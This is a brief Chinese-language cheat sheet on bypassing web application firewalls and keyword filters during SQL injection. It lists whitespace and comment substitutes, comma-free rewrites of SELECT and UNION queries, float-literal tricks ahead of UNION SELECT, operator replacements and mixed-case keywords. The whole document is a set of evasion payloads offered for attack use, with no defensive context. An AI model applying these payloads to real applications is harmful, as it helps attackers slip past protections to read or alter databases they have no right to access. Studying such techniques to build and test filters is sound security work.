sql注入绕过

在实际情况中sql注入一般会被WAF或关键字过滤。

1.空格

%20、%09、%0B、%0C、%0D、%A0、%00、+、/**/、/*!*/、/*!5000*/、()、{}

2.注释

#、-- （后面跟一个空格符）、/**/

3.逗号

select ascii(mid(user(),1,1))=80　　=>　　select ascii(mid(user() from 1 for 1))=80

union select 1,2　　=>　　union select * from (select 1)a join (select 2)b

select ascii(mid(user(),1,1))=80　　=>　　select user() like ‘r%‘

4.浮点数

select * from users where id=8E0union select 1,2,3

select * from users where id =8.0union select 1,2,3

5.运算符

and　　=>　　&&

or　　=>　　||

xor　　=>　　|

not　　=>　　!

=　　=>　　like,rlike,regexp

<>　　=>　　between and,greatest,least,=

6.大小写

UnIon,SeLecT

sql注入绕过